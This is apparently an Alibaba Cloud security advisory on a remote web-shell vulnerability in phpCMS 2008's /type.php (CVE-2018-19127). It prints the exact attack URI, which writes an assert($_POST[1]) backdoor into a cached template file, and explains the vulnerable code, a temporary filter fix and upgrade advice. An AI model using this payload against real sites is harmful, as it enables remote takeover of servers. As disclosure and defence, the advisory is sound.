By Wu Fan
Content management systems and their owners are frequently victims of attacks due to their ubiquity, rich extensibility through 3rd party plugins, direct exposure to the incoming internet traffic, and inadequate attention to keep the CMS and the systems they run on up-to-date. Due to CMS limitations, custom functionality is often hard-coded, making updates to a newer version of CMS difficult or impossible. In addition, 0day vulnerabilities present a serious threat to anybody running even a well maintained publicly-facing website.
This attack on an outdated phpCMS content management system from 2008 highlights several important lessons. At a minimum, any content management system should be routinely upgraded and maintained, and phpCMS 2008 owners must take an immediate action. Second, any web exposure (a website, or a RESTful API) must be protected with a web firewall, which acts as an umbrella for a variety of exploits and vulnerabilities. Modern web firewalls, such as Alibaba Cloud WAF, provide additional protection that go beyond detecting patterns that can be detected with rigid rules. Finally, Managed Security Service, can be an excellent choice for many organizations to continuously receive high quality professional service to minimize the risks.
The situation with this particular vulnerability is complicated by the fact that many people still running phpCMS 2008 may not realize it, otherwise they would have upgraded long time ago.
Yuriy Yuzifovich,
Head of Security Innovation Labs (S.I.L.) at Alibaba Cloud
On November 4, Alibaba Cloud Security discovered a new attack exploiting the /type.php remote GetShell 0day vulnerability of phpCMS 2008 (CNVD-C-2018-127157/CVE-2018-19127). This vulnerability allows attackers to remotely implant WebShell and can result in serious problems, such as file tampering, data leaks, and remote server control. We recommend that vulnerable users upgrade to the latest phpCMS version as soon as possible.
phpCMS is a popular in China and worldwide open-source Content Management System (CMS).
phpCMS was first launched in 2008 and its latest version is v9.6.3. Due to its stability, flexibility, and open-source nature, phpCMS 2008 is still being used by many websites.
When an attacker sends payload data with the following URI to a website installed with phpCMS 2008:
/type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss@unlink(_FILE_);assert($_POST[1]);, this malicious PHP directive is written to the website file /cache_template/rss.tpl.php.
The vulnerability is located in the /type.php file in the PHPCMS 2008 source code. The file contains the following code:
if(empty($template)) $template = 'type';
...
include template('phpcms', $template);where, the $template variable is controlled by input parameters. As you can see, the template() method is included in this variable in subsequent operations. The template() method is defined in the /include/global.func.php file, which includes the following code:
template_compile($module, $template, $istag);The template_compile() method in /include/template.func.php is called here.
function template_compile($module, $template, $istag = 0)
{
...
$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
$content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content);
$strlen = file_put_contents($compiledtplfile, $content);
...
}In this method, the $template variable is used to generate both the file path in $compiledtplfile and the file content in $content.
In the attack payload mentioned previously, $template is set to the following value:
tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rssTherefore, when the file_put_contents() function is called in the template_compile() method, the first parameter is written as data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss.tpl.php. PHP resolves this parameter to "data/cache_template/rss.tpl.php".
Finally, @unlink(_FILE_);assert($_POST[1]); is written to this file.
Already ten years old, phpCMS is still being used by many websites, including government and corporate websites. phpCMS 2008 is still being used by nearly 200 websites according to the network-wide exact search results from FOFA and over 10 thousand websites according to the fuzzy match results.
Exploiting this vulnerability, attackers can write malicious script code to a file with a controllable path and then send WebShell directives to the file to have the server run any code. The impact of this code injection vulnerability can be severe.
A temporary solution is to filter values of the $template variable in the /type.php file. This prevents the inclusion of user-input content that contains "(", "{", and other such symbols as well as the processing of such content as path or script content.
However, because phpCMS 2008 is out of date, we recommend that you upgrade it to the latest phpCMS version as soon as possible to guarantee your security.
Alibaba Cloud Discovers the Latest ThinkPHP v5 Vulnerability
32 posts | 15 followers
FollowAlibaba Cloud Security - August 29, 2018
Alibaba Clouder - June 11, 2019
Alibaba Clouder - August 31, 2021
Alibaba Cloud Security - December 25, 2018
Alibaba Cloud Security - January 13, 2019
Alibaba Clouder - January 19, 2018
32 posts | 15 followers
Follow
WAF(Web Application Firewall)
A cloud firewall service utilizing big data capabilities to protect against web-based attacks
Learn More
Web Hosting Solution
Explore Web Hosting solutions that can power your personal website or empower your online business.
Learn More
Web App Service
Web App Service allows you to deploy, scale, adjust, and monitor applications in an easy, efficient, secure, and flexible manner.
Learn More
Web Hosting
Explore how our Web Hosting solutions help small and medium sized companies power their websites and online businesses.
Learn MoreMore Posts by Alibaba Cloud Security